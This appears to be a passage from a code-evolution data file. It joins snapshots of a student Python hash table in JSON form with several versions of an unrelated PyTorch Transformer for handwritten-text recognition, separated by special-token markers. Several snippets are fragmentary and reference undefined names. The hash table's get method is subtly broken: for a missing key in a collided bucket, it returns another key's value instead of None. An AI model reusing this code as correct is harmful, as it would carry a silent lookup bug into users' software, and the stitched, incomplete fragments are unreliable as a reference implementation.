"step-4": "class HashTableEntry:\n \"\"\"\n Hash Table entry, as a linked list node.\n \"\"\"\n\n def __init__(self, key, value):\n self.key = key\n self.value = value\n self.next = None\n\n\nclass HashTable:\n \"\"\"\n A hash table that with `capacity` buckets\n that accepts string keys\n\n Implement this.\n \"\"\"\n\n def __init__(self, capacity):\n self.capacity = capacity\n self.storage = [None] * capacity\n self.numberOfItems = 0\n\n def fnv1(self, key):\n \"\"\"\n FNV-1 64-bit hash function\n\n Implement this, and/or DJB2.\n \"\"\"\n hash = 14695981039346656037\n for n in key.encode():\n hash = hash ^ n\n hash = hash * 1099511628211\n return hash\n\n def djb2(self, key):\n \"\"\"\n DJB2 32-bit hash function\n\n Implement this, and/or FNV-1.\n \"\"\"\n hash = 5381\n for n in key.encode():\n hash = hash * 33 + n\n return hash\n\n def hash_index(self, key):\n \"\"\"\n Take an arbitrary key and return a valid integer index\n between within the storage capacity of the hash table.\n \"\"\"\n return self.djb2(key) % self.capacity\n\n def put(self, key, value):\n \"\"\"\n Store the value with the given key.\n\n Hash collisions should be handled with Linked List Chaining.\n\n Implement this.\n \"\"\"\n hi = self.hash_index(key)\n if self.storage[hi]:\n current = self.storage[hi]\n while current.next and current.key != key:\n current = current.next\n if current.key == key:\n current.value = value\n else:\n current.next = HashTableEntry(key, value)\n self.numberOfItems += 1\n else:\n self.storage[hi] = HashTableEntry(key, value)\n self.numberOfItems += 1\n self.calculateLoad()\n\n def delete(self, key):\n \"\"\"\n Remove the value stored with the given key.\n\n Print a warning if the key is not found.\n\n Implement this.\n \"\"\"\n hi = self.hash_index(key)\n current = self.storage[hi]\n prev = self.storage[hi]\n while current and current.key != key:\n prev = current\n current = current.next\n if current and current.key == key:\n if current == self.storage[hi]:\n 
self.storage[hi] = current.next\n else:\n prev.next = current.next\n self.numberOfItems -= 1\n else:\n print('WARNING: no key')\n self.calculateLoad()\n\n def get(self, key):\n \"\"\"\n Retrieve the value stored with the given key.\n\n Returns None if the key is not found.\n\n Implement this.\n \"\"\"\n hi = self.hash_index(key)\n if self.storage[hi]:\n if self.storage[hi].next:\n current = self.storage[hi]\n while current.next and current.key != key:\n current = current.next\n return current.value\n else:\n return self.storage[hi].value\n return None\n\n def resize(self, factor=2):\n \"\"\"\n Doubles the capacity of the hash table and\n rehash all key/value pairs.\n\n Implement this.\n \"\"\"\n self.capacity = round(self.capacity * factor)\n newarr = [None] * self.capacity\n for i, v in enumerate(self.storage):\n while v:\n hi = self.hash_index(v.key)\n if newarr[hi]:\n current = newarr[hi]\n while current.next:\n current = current.next\n current.next = HashTableEntry(v.key, v.value)\n else:\n newarr[hi] = HashTableEntry(v.key, v.value)\n v = v.next\n self.storage = newarr\n\n def calculateLoad(self):\n load = self.numberOfItems / len(self.storage)\n if load > 0.7:\n self.resize(2)\n elif load < 0.2:\n self.resize(0.5)\n pass\n\n\nif __name__ == '__main__':\n ht = HashTable(2)\n ht.put('line_1', '111')\n ht.put('line_2', '222')\n ht.put('line_3', '333')\n ht.put('line_4', 'sss')\n ht.put('line_5', 'ddd')\n ht.put('line_6', 'ggg')\n ht.put('line_7', 'hhh')\n ht.put('line_12', 'jjj')\n print('')\n old_capacity = len(ht.storage)\n ht.resize()\n new_capacity = len(ht.storage)\n print(f'\\nResized from {old_capacity} to {new_capacity}.\\n')\n print('')\n for i, v in enumerate(ht.storage):\n while v:\n print(i, v.value)\n v = v.next\n print('')\n ht.delete('line_3')\n print('')\n for i, v in enumerate(ht.storage):\n while v:\n print(i, v.value)\n v = v.next\n print('')\n print('')\n",
"step-5": "class HashTableEntry:\n \"\"\"\n Hash Table entry, as a linked list node.\n \"\"\"\n\n def __init__(self, key, value):\n self.key = key\n self.value = value\n self.next = None\n\n\nclass HashTable:\n \"\"\"\n A hash table that with `capacity` buckets\n that accepts string keys\n\n Implement this.\n \"\"\"\n\n def __init__(self, capacity):\n self.capacity = capacity\n self.storage = [None] * capacity\n self.numberOfItems = 0\n\n def fnv1(self, key):\n \"\"\"\n FNV-1 64-bit hash function\n\n Implement this, and/or DJB2.\n \"\"\"\n # hash = 0xff\n hash = 0xcbf29ce484222325\n for n in key.encode():\n # print(n)\n hash = hash ^ n\n hash = hash * 0x100000001b3\n\n # print(hash)\n return hash\n\n def djb2(self, key):\n \"\"\"\n DJB2 32-bit hash function\n\n Implement this, and/or FNV-1.\n \"\"\"\n\n hash = 5381\n for n in key.encode():\n # hash = ((hash << 5) + hash) + n\n hash = hash * 33 + n\n\n return hash\n # return hash & 0xFFFFFFFF\n\n def hash_index(self, key):\n \"\"\"\n Take an arbitrary key and return a valid integer index\n between within the storage capacity of the hash table.\n \"\"\"\n # return self.fnv1(key) % self.capacity\n return self.djb2(key) % self.capacity\n\n def put(self, key, value):\n \"\"\"\n Store the value with the given key.\n\n Hash collisions should be handled with Linked List Chaining.\n\n Implement this.\n \"\"\"\n hi = self.hash_index(key)\n if self.storage[hi]:\n current = self.storage[hi]\n while current.next and current.key != key:\n current = current.next\n\n if current.key == key:\n current.value = value\n else:\n current.next = HashTableEntry(key, value)\n self.numberOfItems += 1\n else:\n self.storage[hi] = HashTableEntry(key, value)\n self.numberOfItems += 1\n\n self.calculateLoad()\n\n def delete(self, key):\n \"\"\"\n Remove the value stored with the given key.\n\n Print a warning if the key is not found.\n\n Implement this.\n \"\"\"\n\n hi = self.hash_index(key)\n\n # if that hi is empty ignore\n # if 
self.storage[hi] is None:\n # print(\"WARNING: no key\")\n # return\n\n current = self.storage[hi]\n prev = self.storage[hi]\n while current and current.key != key:\n prev = current\n current = current.next\n\n if (current and current.key == key):\n # if its the first link in the list\n if (current == self.storage[hi]):\n self.storage[hi] = current.next\n else:\n prev.next = current.next\n\n self.numberOfItems -= 1\n else:\n print(\"WARNING: no key\")\n\n self.calculateLoad()\n\n def get(self, key):\n \"\"\"\n Retrieve the value stored with the given key.\n\n Returns None if the key is not found.\n\n Implement this.\n \"\"\"\n hi = self.hash_index(key)\n if (self.storage[hi]):\n if(self.storage[hi].next):\n current = self.storage[hi]\n while current.next and current.key != key:\n current = current.next\n return current.value\n else:\n return self.storage[hi].value\n\n return None\n\n def resize(self, factor=2):\n \"\"\"\n Doubles the capacity of the hash table and\n rehash all key/value pairs.\n\n Implement this.\n \"\"\"\n self.capacity = round(self.capacity*factor)\n newarr = [None] * self.capacity\n\n for i, v in enumerate(self.storage):\n while v:\n hi = self.hash_index(v.key)\n if newarr[hi]:\n current = newarr[hi]\n while current.next:\n current = current.next\n\n current.next = HashTableEntry(v.key, v.value)\n else:\n newarr[hi] = HashTableEntry(v.key, v.value)\n\n v = v.next\n\n self.storage = newarr\n\n # Solution 2 - Much cleaner\n # newHashTable = HashTable(round(self.capacity*factor))\n # for i, v in enumerate(self.storage):\n # while v:\n # newHashTable.put(v.key, v.value)\n # v = v.next\n\n # self.capacity = newHashTable.capacity\n # self.storage = newHashTable.storage\n\n def calculateLoad(self):\n load = self.numberOfItems/len(self.storage)\n\n # print(\"Items:\\t\", ht.numberOfItems)\n # print(\"Storage:\", len(ht.storage))\n # print(\"LOAD:\\t\", load)\n\n # comment code bellow to pass tests\n if load > 0.7:\n self.resize(2)\n elif load < 0.2:\n 
self.resize(0.5)\n\n pass\n\n\nif __name__ == \"__main__\":\n ht = HashTable(2)\n\n ht.put(\"line_1\", \"111\")\n ht.put(\"line_2\", \"222\")\n ht.put(\"line_3\", \"333\")\n ht.put(\"line_4\", \"sss\")\n ht.put(\"line_5\", \"ddd\")\n ht.put(\"line_6\", \"ggg\")\n ht.put(\"line_7\", \"hhh\")\n ht.put(\"line_12\", \"jjj\")\n\n print(\"\")\n\n # Test storing beyond capacity\n # print(ht.get(\"line_1\"))\n # print(ht.get(\"line_2\"))\n # print(ht.get(\"line_3\"))\n # print(ht.get(\"line_4\"))\n # print(ht.get(\"line_5\"))\n # print(ht.get(\"line_6\"))\n # print(ht.get(\"line_7\"))\n\n # Test resizing\n old_capacity = len(ht.storage)\n ht.resize()\n new_capacity = len(ht.storage)\n\n print(f\"\\nResized from {old_capacity} to {new_capacity}.\\n\")\n\n # print(\"1: \", ht.storage[1].value)\n # print(\"1: \", ht.storage[1].next.value)\n\n # print(\"3: \", ht.storage[3].value)\n # print(\"3: \", ht.storage[3].next.value)\n # print(\"3: \", ht.storage[3].next.next.value)\n\n print(\"\")\n for i, v in enumerate(ht.storage):\n while v:\n print(i, v.value)\n v = v.next\n print(\"\")\n ht.delete(\"line_3\")\n print(\"\")\n for i, v in enumerate(ht.storage):\n while v:\n print(i, v.value)\n v = v.next\n print(\"\")\n\n # Test if data intact after resizing\n # print(ht.get(\"line_1\"))\n # print(ht.get(\"line_2\"))\n # print(ht.get(\"line_3\"))\n # print(ht.get(\"line_4\"))\n # print(ht.get(\"line_5\"))\n # print(ht.get(\"line_6\"))\n # print(ht.get(\"line_7\"))\n\n print(\"\")\n",
"step-ids": [
6,
11,
13,
15,
16
]
}
|
[
6,
11,
13,
15,
16
] |
<|reserved_special_token_0|>
class PositionalEncoding(nn.Module):
    """Fixed sinusoidal positional-encoding layer (Vaswani et al., 2017)."""

    def __init__(self, d_model, max_len, dropout=0.1):
        super(PositionalEncoding, self).__init__()
        self.dropout = nn.Dropout(p=dropout)
        # Precompute the (max_len, d_model) sin/cos table once.
        pe = torch.zeros(max_len, d_model)
        position = torch.arange(0, max_len, dtype=torch.float).unsqueeze(1)
        # Geometric frequency ladder: 10000^(-2i/d_model) over even dims i.
        div_term = torch.exp(torch.arange(0, d_model, 2).float() * (-math.
            log(10000.0) / d_model))
        pe[:, 0::2] = torch.sin(position * div_term)
        pe[:, 1::2] = torch.cos(position * div_term)
        # Reshape to (max_len, 1, d_model) so it broadcasts over the batch dim.
        pe = pe.unsqueeze(0).transpose(0, 1)
        # Buffer (not a parameter): moves with the module, never trained.
        self.register_buffer('pe', pe)
<|reserved_special_token_0|>
class TransformerHTR(nn.Module):
    """Handwritten-text recognizer: ResNet visual features feeding a
    Transformer decoder that emits character ids autoregressively.

    `alphabet` maps characters plus the specials '<S>', '<E>', '<P>' to
    integer ids; `dict_size` must cover every id in it.
    """

    def __init__(self, alphabet, freeze_resnet=False, use_encoder=False,
        dict_size=83, f=1024, num_layers=4, num_heads=8, dropout=0.1,
        text_len=100):
        super(TransformerHTR, self).__init__()
        # NOTE: submodules are created in this exact order; reordering would
        # change state_dict keys and RNG consumption (init reproducibility).
        self.resnet = ResNetFeatures()
        if freeze_resnet:
            print('Freezing-resnet')
            for param in self.resnet.resnet.parameters():
                param.requires_grad = False
        # Projects the flattened (channels * height) axis down to f; assumes
        # the ResNet feature map has height 4 so f*4 matches -- TODO confirm
        # against the input image height used by the dataset.
        self.fc = nn.Linear(f * 4, f)
        self.pe_encode = PositionalEncoding(f, 140, dropout)
        self.fc_bar = nn.Linear(f, f)
        if use_encoder:
            print('Transformer Encoder')
            encoder_layers = nn.TransformerEncoderLayer(f, num_heads, f,
                dropout)
            self.transformer_encoder = nn.TransformerEncoder(encoder_layers,
                num_layers)
        else:
            print('Identity encoder')
            self.transformer_encoder = nn.Identity()
        # Registered but not referenced by the visible encode/decode paths.
        self.layer_norm = nn.LayerNorm(f)
        print('freeze-resnet', freeze_resnet)
        print('use_encoder', use_encoder)
        # Text decoder: token embedding + positional encoding + Transformer.
        self.ebl = nn.Embedding(dict_size, f)
        self.pe_decode = PositionalEncoding(f, text_len, dropout)
        decoder_layer = nn.TransformerDecoderLayer(d_model=f, nhead=
            num_heads, dim_feedforward=f, dropout=dropout)
        self.transformer_decoder = nn.TransformerDecoder(decoder_layer,
            num_layers=num_layers)
        self.linear = nn.Linear(f, dict_size)
        self.f = f
        self.text_len = text_len
        self.alphabet = alphabet
        self.inv_alphabet = {j: i for i, j in alphabet.items()}  # id -> char
        self.init_weights()

    def init_weights(self):
        """Uniformly init projection/embedding weights in [-0.1, 0.1]; zero biases."""
        initrange = 0.1
        self.fc.bias.data.zero_()
        self.fc.weight.data.uniform_(-initrange, initrange)
        self.fc_bar.bias.data.zero_()
        self.fc_bar.weight.data.uniform_(-initrange, initrange)
        self.ebl.weight.data.uniform_(-initrange, initrange)
        self.linear.bias.data.zero_()
        self.linear.weight.data.uniform_(-initrange, initrange)

    def generate_square_subsequent_mask(self, sz):
        """Causal (sz, sz) mask: 0.0 on/below the diagonal, -inf above it."""
        mask = (torch.triu(torch.ones(sz, sz)) == 1).transpose(0, 1)
        mask = mask.float().masked_fill(mask == 0, float('-inf')).masked_fill(
            mask == 1, float(0.0))
        return mask

    def encode(self, x):
        """Map an image batch to a (width, batch, f) memory sequence."""
        x = self.resnet(x)
        b, f, h, w = x.size()
        # Fold channels and height together; treat width as sequence length.
        x = x.view(b, f * h, w).permute(0, 2, 1)
        x = self.fc(x)
        x = self.pe_encode(x.permute(1, 0, 2))
        x = self.fc_bar(x)
        x = self.transformer_encoder(x)
        return x

    def decode(self, x, y):
        """Decode target ids x (T, B) against memory y; returns (B, T, dict_size) logits."""
        # Key-padding mask: ignore '<P>' positions in target attention.
        kpm = (x == self.alphabet['<P>']).transpose(1, 0)
        x = self.ebl(x) * math.sqrt(self.f)
        x = self.pe_decode(x)
        dim = x.size()[0]
        a = self.generate_square_subsequent_mask(dim).to(x.device)
        x = self.transformer_decoder(x, y, a, tgt_key_padding_mask=kpm)
        return self.linear(x).permute(1, 0, 2)

    def forward(self, x, y):
        """x: target token ids (T, B); y: image batch. Returns decoder logits."""
        return self.decode(x, self.encode(y))

    @torch.no_grad()
    def to_text_(self, x, bulk=True):
        """Map one id sequence to characters.

        bulk=True returns every symbol (specials included) as a list;
        bulk=False stops at '<E>', skips '<S>'/'<P>', and joins to a string.
        """
        txt = []
        p = {self.alphabet['<E>']}
        s = {self.alphabet['<S>'], self.alphabet['<P>']}
        for idx in x:
            if not bulk:
                if idx in p:
                    break
                if idx in s:
                    continue
            txt.append(self.inv_alphabet[idx])
        return txt if bulk else ''.join(txt)

    @torch.no_grad()
    def to_text(self, x, bulk=False):
        """Decode a (B, T) id batch to a list of results, or a single sequence."""
        x = x.cpu().numpy()
        if len(x.shape) == 2:
            return [self.to_text_(x[i], bulk=bulk) for i in range(x.shape[0])]
        else:
            return self.to_text_(x, bulk=bulk)

    @torch.no_grad()
    def gen(self, y, bulk=False):
        """Greedy autoregressive decoding of image batch y for text_len steps."""
        y = self.encode(y)
        # Start every row with '<S>'; remaining slots hold '<P>' until filled.
        output_tokens = torch.full((y.size()[1], self.text_len), self.
            alphabet['<P>']).long()
        output_tokens[:, 0] = self.alphabet['<S>']
        output_tokens = output_tokens.to(y.device)
        for j in range(1, self.text_len):
            x = output_tokens[:, :j].permute(1, 0)
            x = self.decode(x, y)
            a = torch.argmax(x, dim=-1)
            output_tokens[:, j] = a[:, -1]
        if bulk:
            return self.to_text(output_tokens[:, 1:], bulk=True), output_tokens
        else:
            return self.to_text(output_tokens)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ResNetFeatures(nn.Module):
    """Truncated ResNet-50 backbone: returns layer3 activations as features.

    Single-channel input is tiled to 3 channels to fit the pretrained stem.
    """

    def __init__(self, pretrained=True):
        super().__init__()
        self.resnet = torchvision.models.resnet50(pretrained=pretrained)

    def forward(self, x):
        net = self.resnet
        # Tile the grayscale channel to RGB, then run the convolutional stem.
        out = net.conv1(x.repeat(1, 3, 1, 1))
        out = net.maxpool(net.relu(net.bn1(out)))
        # Stop after layer3; layer4/avgpool/fc are intentionally unused.
        for stage in (net.layer1, net.layer2, net.layer3):
            out = stage(out)
        return out
class PositionalEncoding(nn.Module):
    """Fixed sinusoidal position embeddings (Vaswani et al., 2017).

    Holds a (max_len, 1, d_model) buffer and adds its first T rows to a
    (T, B, d_model) input, followed by dropout.
    """

    def __init__(self, d_model, max_len, dropout=0.1):
        super(PositionalEncoding, self).__init__()
        self.dropout = nn.Dropout(p=dropout)
        position = torch.arange(0, max_len, dtype=torch.float).unsqueeze(1)
        freq = torch.exp(torch.arange(0, d_model, 2).float() *
                         (-math.log(10000.0) / d_model))
        table = torch.zeros(max_len, d_model)
        table[:, 0::2] = torch.sin(position * freq)  # even dims: sine
        table[:, 1::2] = torch.cos(position * freq)  # odd dims: cosine
        self.register_buffer('pe', table.unsqueeze(0).transpose(0, 1))

    def forward(self, x):
        """Add encodings for the first x.size(0) positions, then apply dropout."""
        return self.dropout(x + self.pe[:x.size(0), :])
class TransformerHTR(nn.Module):
    """ResNet-backed Transformer for handwritten-text recognition.

    Visual features are projected to width-f vectors and consumed by a
    Transformer decoder that predicts one character id per step.
    `alphabet` maps characters plus '<S>', '<E>', '<P>' to integer ids.
    """

    def __init__(self, alphabet, freeze_resnet=False, use_encoder=False,
        dict_size=83, f=1024, num_layers=4, num_heads=8, dropout=0.1,
        text_len=100):
        super(TransformerHTR, self).__init__()
        # --- visual encoder (creation order fixed: state_dict keys / RNG) ---
        self.resnet = ResNetFeatures()
        if freeze_resnet:
            print('Freezing-resnet')
            for param in self.resnet.resnet.parameters():
                param.requires_grad = False
        self.fc = nn.Linear(f * 4, f)
        self.pe_encode = PositionalEncoding(f, 140, dropout)
        self.fc_bar = nn.Linear(f, f)
        if use_encoder:
            print('Transformer Encoder')
            enc_layer = nn.TransformerEncoderLayer(f, num_heads, f, dropout)
            self.transformer_encoder = nn.TransformerEncoder(enc_layer, num_layers)
        else:
            print('Identity encoder')
            self.transformer_encoder = nn.Identity()
        self.layer_norm = nn.LayerNorm(f)
        print('freeze-resnet', freeze_resnet)
        print('use_encoder', use_encoder)
        # --- text decoder ---
        self.ebl = nn.Embedding(dict_size, f)
        self.pe_decode = PositionalEncoding(f, text_len, dropout)
        dec_layer = nn.TransformerDecoderLayer(d_model=f, nhead=num_heads,
            dim_feedforward=f, dropout=dropout)
        self.transformer_decoder = nn.TransformerDecoder(dec_layer,
            num_layers=num_layers)
        self.linear = nn.Linear(f, dict_size)
        # --- bookkeeping ---
        self.f = f
        self.text_len = text_len
        self.alphabet = alphabet
        self.inv_alphabet = {idx: ch for ch, idx in alphabet.items()}
        self.init_weights()

    def init_weights(self):
        """Uniform [-0.1, 0.1] init for weights; zero all biases."""
        bound = 0.1
        # Draw order matters for reproducibility: fc, fc_bar, ebl, linear.
        for layer in (self.fc, self.fc_bar):
            layer.bias.data.zero_()
            layer.weight.data.uniform_(-bound, bound)
        self.ebl.weight.data.uniform_(-bound, bound)
        self.linear.bias.data.zero_()
        self.linear.weight.data.uniform_(-bound, bound)

    def generate_square_subsequent_mask(self, sz):
        """Build the (sz, sz) causal mask: 0.0 on/below the diagonal, -inf above."""
        allowed = (torch.triu(torch.ones(sz, sz)) == 1).transpose(0, 1)
        out = allowed.float()
        out = out.masked_fill(allowed == 0, float('-inf'))
        out = out.masked_fill(allowed == 1, float(0.0))
        return out

    def encode(self, x):
        """Image batch -> (width, batch, f) memory sequence for the decoder."""
        feats = self.resnet(x)
        b, c, h, w = feats.size()
        # Fold channels and height together; width becomes sequence length.
        seq = feats.view(b, c * h, w).permute(0, 2, 1)
        seq = self.fc(seq)
        seq = self.pe_encode(seq.permute(1, 0, 2))
        seq = self.fc_bar(seq)
        return self.transformer_encoder(seq)

    def decode(self, x, y):
        """Target ids x (T, B) + memory y -> logits of shape (B, T, dict_size)."""
        pad_mask = (x == self.alphabet['<P>']).transpose(1, 0)
        emb = self.ebl(x) * math.sqrt(self.f)
        emb = self.pe_decode(emb)
        causal = self.generate_square_subsequent_mask(emb.size()[0]).to(emb.device)
        out = self.transformer_decoder(emb, y, causal, tgt_key_padding_mask=pad_mask)
        return self.linear(out).permute(1, 0, 2)

    def forward(self, x, y):
        """x: token ids (T, B); y: image batch. Returns decoder logits."""
        return self.decode(x, self.encode(y))

    @torch.no_grad()
    def to_text_(self, x, bulk=True):
        """Decode one id sequence; bulk keeps all symbols as a list, otherwise
        stop at '<E>', skip '<S>'/'<P>' and join into a string."""
        end_ids = {self.alphabet['<E>']}
        skip_ids = {self.alphabet['<S>'], self.alphabet['<P>']}
        chars = []
        for token in x:
            if not bulk:
                if token in end_ids:
                    break
                if token in skip_ids:
                    continue
            chars.append(self.inv_alphabet[token])
        if bulk:
            return chars
        return ''.join(chars)

    @torch.no_grad()
    def to_text(self, x, bulk=False):
        """Decode a (B, T) batch (list of results) or a single sequence."""
        arr = x.cpu().numpy()
        if len(arr.shape) == 2:
            return [self.to_text_(row, bulk=bulk) for row in arr]
        return self.to_text_(arr, bulk=bulk)

    @torch.no_grad()
    def gen(self, y, bulk=False):
        """Greedily decode image batch y into token ids / text."""
        memory = self.encode(y)
        tokens = torch.full((memory.size()[1], self.text_len),
                            self.alphabet['<P>']).long()
        tokens[:, 0] = self.alphabet['<S>']
        tokens = tokens.to(memory.device)
        for step in range(1, self.text_len):
            logits = self.decode(tokens[:, :step].permute(1, 0), memory)
            tokens[:, step] = torch.argmax(logits, dim=-1)[:, -1]
        if bulk:
            return self.to_text(tokens[:, 1:], bulk=True), tokens
        return self.to_text(tokens)
<|reserved_special_token_0|>
def get(x):
    """Return the index assigned to x, minting the next free index on first use."""
    # setdefault evaluates len() before inserting, so new entries receive
    # consecutive indices exactly as the manual lookup-then-insert did.
    return character_dict.setdefault(x, len(character_dict))
<|reserved_special_token_0|>
def load_text_tensor(txt):
    """Encode txt as a (T, 1) LongTensor of ALPHABET ids."""
    ids = [ALPHABET[ch] for ch in load_text(txt)]
    return torch.LongTensor(ids).unsqueeze(1)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ResNetFeatures(nn.Module):
    """Truncated ResNet-50 backbone: returns layer3 activations as features.

    Single-channel input is tiled to 3 channels to fit the pretrained stem.
    """

    def __init__(self, pretrained=True):
        super().__init__()
        self.resnet = torchvision.models.resnet50(pretrained=pretrained)

    def forward(self, x):
        net = self.resnet
        # Tile the grayscale channel to RGB, then run the convolutional stem.
        out = net.conv1(x.repeat(1, 3, 1, 1))
        out = net.maxpool(net.relu(net.bn1(out)))
        # Stop after layer3; layer4/avgpool/fc are intentionally unused.
        for stage in (net.layer1, net.layer2, net.layer3):
            out = stage(out)
        return out
class PositionalEncoding(nn.Module):
    """Fixed sinusoidal position embeddings (Vaswani et al., 2017).

    Holds a (max_len, 1, d_model) buffer and adds its first T rows to a
    (T, B, d_model) input, followed by dropout.
    """

    def __init__(self, d_model, max_len, dropout=0.1):
        super(PositionalEncoding, self).__init__()
        self.dropout = nn.Dropout(p=dropout)
        position = torch.arange(0, max_len, dtype=torch.float).unsqueeze(1)
        freq = torch.exp(torch.arange(0, d_model, 2).float() *
                         (-math.log(10000.0) / d_model))
        table = torch.zeros(max_len, d_model)
        table[:, 0::2] = torch.sin(position * freq)  # even dims: sine
        table[:, 1::2] = torch.cos(position * freq)  # odd dims: cosine
        self.register_buffer('pe', table.unsqueeze(0).transpose(0, 1))

    def forward(self, x):
        """Add encodings for the first x.size(0) positions, then apply dropout."""
        return self.dropout(x + self.pe[:x.size(0), :])
class TransformerHTR(nn.Module):
    """ResNet-backed Transformer for handwritten-text recognition.

    Visual features are projected to width-f vectors and consumed by a
    Transformer decoder that predicts one character id per step.
    `alphabet` maps characters plus '<S>', '<E>', '<P>' to integer ids.
    """

    def __init__(self, alphabet, freeze_resnet=False, use_encoder=False,
        dict_size=83, f=1024, num_layers=4, num_heads=8, dropout=0.1,
        text_len=100):
        super(TransformerHTR, self).__init__()
        # --- visual encoder (creation order fixed: state_dict keys / RNG) ---
        self.resnet = ResNetFeatures()
        if freeze_resnet:
            print('Freezing-resnet')
            for param in self.resnet.resnet.parameters():
                param.requires_grad = False
        self.fc = nn.Linear(f * 4, f)
        self.pe_encode = PositionalEncoding(f, 140, dropout)
        self.fc_bar = nn.Linear(f, f)
        if use_encoder:
            print('Transformer Encoder')
            enc_layer = nn.TransformerEncoderLayer(f, num_heads, f, dropout)
            self.transformer_encoder = nn.TransformerEncoder(enc_layer, num_layers)
        else:
            print('Identity encoder')
            self.transformer_encoder = nn.Identity()
        self.layer_norm = nn.LayerNorm(f)
        print('freeze-resnet', freeze_resnet)
        print('use_encoder', use_encoder)
        # --- text decoder ---
        self.ebl = nn.Embedding(dict_size, f)
        self.pe_decode = PositionalEncoding(f, text_len, dropout)
        dec_layer = nn.TransformerDecoderLayer(d_model=f, nhead=num_heads,
            dim_feedforward=f, dropout=dropout)
        self.transformer_decoder = nn.TransformerDecoder(dec_layer,
            num_layers=num_layers)
        self.linear = nn.Linear(f, dict_size)
        # --- bookkeeping ---
        self.f = f
        self.text_len = text_len
        self.alphabet = alphabet
        self.inv_alphabet = {idx: ch for ch, idx in alphabet.items()}
        self.init_weights()

    def init_weights(self):
        """Uniform [-0.1, 0.1] init for weights; zero all biases."""
        bound = 0.1
        # Draw order matters for reproducibility: fc, fc_bar, ebl, linear.
        for layer in (self.fc, self.fc_bar):
            layer.bias.data.zero_()
            layer.weight.data.uniform_(-bound, bound)
        self.ebl.weight.data.uniform_(-bound, bound)
        self.linear.bias.data.zero_()
        self.linear.weight.data.uniform_(-bound, bound)

    def generate_square_subsequent_mask(self, sz):
        """Build the (sz, sz) causal mask: 0.0 on/below the diagonal, -inf above."""
        allowed = (torch.triu(torch.ones(sz, sz)) == 1).transpose(0, 1)
        out = allowed.float()
        out = out.masked_fill(allowed == 0, float('-inf'))
        out = out.masked_fill(allowed == 1, float(0.0))
        return out

    def encode(self, x):
        """Image batch -> (width, batch, f) memory sequence for the decoder."""
        feats = self.resnet(x)
        b, c, h, w = feats.size()
        # Fold channels and height together; width becomes sequence length.
        seq = feats.view(b, c * h, w).permute(0, 2, 1)
        seq = self.fc(seq)
        seq = self.pe_encode(seq.permute(1, 0, 2))
        seq = self.fc_bar(seq)
        return self.transformer_encoder(seq)

    def decode(self, x, y):
        """Target ids x (T, B) + memory y -> logits of shape (B, T, dict_size)."""
        pad_mask = (x == self.alphabet['<P>']).transpose(1, 0)
        emb = self.ebl(x) * math.sqrt(self.f)
        emb = self.pe_decode(emb)
        causal = self.generate_square_subsequent_mask(emb.size()[0]).to(emb.device)
        out = self.transformer_decoder(emb, y, causal, tgt_key_padding_mask=pad_mask)
        return self.linear(out).permute(1, 0, 2)

    def forward(self, x, y):
        """x: token ids (T, B); y: image batch. Returns decoder logits."""
        return self.decode(x, self.encode(y))

    @torch.no_grad()
    def to_text_(self, x, bulk=True):
        """Decode one id sequence; bulk keeps all symbols as a list, otherwise
        stop at '<E>', skip '<S>'/'<P>' and join into a string."""
        end_ids = {self.alphabet['<E>']}
        skip_ids = {self.alphabet['<S>'], self.alphabet['<P>']}
        chars = []
        for token in x:
            if not bulk:
                if token in end_ids:
                    break
                if token in skip_ids:
                    continue
            chars.append(self.inv_alphabet[token])
        if bulk:
            return chars
        return ''.join(chars)

    @torch.no_grad()
    def to_text(self, x, bulk=False):
        """Decode a (B, T) batch (list of results) or a single sequence."""
        arr = x.cpu().numpy()
        if len(arr.shape) == 2:
            return [self.to_text_(row, bulk=bulk) for row in arr]
        return self.to_text_(arr, bulk=bulk)

    @torch.no_grad()
    def gen(self, y, bulk=False):
        """Greedily decode image batch y into token ids / text."""
        memory = self.encode(y)
        tokens = torch.full((memory.size()[1], self.text_len),
                            self.alphabet['<P>']).long()
        tokens[:, 0] = self.alphabet['<S>']
        tokens = tokens.to(memory.device)
        for step in range(1, self.text_len):
            logits = self.decode(tokens[:, :step].permute(1, 0), memory)
            tokens[:, step] = torch.argmax(logits, dim=-1)[:, -1]
        if bulk:
            return self.to_text(tokens[:, 1:], bulk=True), tokens
        return self.to_text(tokens)
<|reserved_special_token_0|>
def load_batch_image(max_img=2):
    """Stack the numbered debug images into a (max_img, 1, H, W) batch."""
    images = [load_image(os.path.join('debug-data', f'{n}.png'))
              for n in range(1, max_img + 1)]
    return torch.cat(images, dim=0).unsqueeze(1)
<|reserved_special_token_0|>
def get(x):
    """Return the index assigned to x, minting the next free index on first use."""
    # setdefault evaluates len() before inserting, so new entries receive
    # consecutive indices exactly as the manual lookup-then-insert did.
    return character_dict.setdefault(x, len(character_dict))
<|reserved_special_token_0|>
def load_text_tensor(txt):
    """Encode txt as a (T, 1) LongTensor of ALPHABET ids."""
    ids = [ALPHABET[ch] for ch in load_text(txt)]
    return torch.LongTensor(ids).unsqueeze(1)
def load_batch_text():
    """Concatenate the two debug transcriptions along the batch dimension."""
    columns = [load_text_tensor(line) for line in TXT[:2]]
    return torch.cat(columns, dim=1)
# Smoke test: one forward/backward pass plus greedy generation on debug data.
if __name__ == '__main__':
    transformer = TransformerHTR(ALPHABET, text_len=MAX_LEN)
    bt = load_batch_text()  # (T, B) token ids
    print(bt.size())
    # Teacher forcing: feed the full token sequence alongside the images.
    b = transformer(bt[0:transformer.text_len, :], load_batch_image())
    criterion = nn.CrossEntropyLoss()
    loss = 0
    trgt = bt[1:, :]  # targets are the inputs shifted left by one step
    for i in range(trgt.size()[1]):
        loss += criterion(b[i], trgt[:, i])
    loss.backward()
    out = transformer.gen(load_batch_image())
    print(out)
<|reserved_special_token_1|>
import torch
from torch import nn
from torch.nn import functional as F
import torchvision
import math
from torchvision.models.resnet import Bottleneck
from dataset import load_image, load_text, ALPHABET, MAX_LEN
class ResNetFeatures(nn.Module):
    """Truncated ResNet-50 backbone: returns layer3 activations as features.

    Single-channel input is tiled to 3 channels to fit the pretrained stem.
    """

    def __init__(self, pretrained=True):
        super().__init__()
        self.resnet = torchvision.models.resnet50(pretrained=pretrained)

    def forward(self, x):
        net = self.resnet
        # Tile the grayscale channel to RGB, then run the convolutional stem.
        out = net.conv1(x.repeat(1, 3, 1, 1))
        out = net.maxpool(net.relu(net.bn1(out)))
        # Stop after layer3; layer4/avgpool/fc are intentionally unused.
        for stage in (net.layer1, net.layer2, net.layer3):
            out = stage(out)
        return out
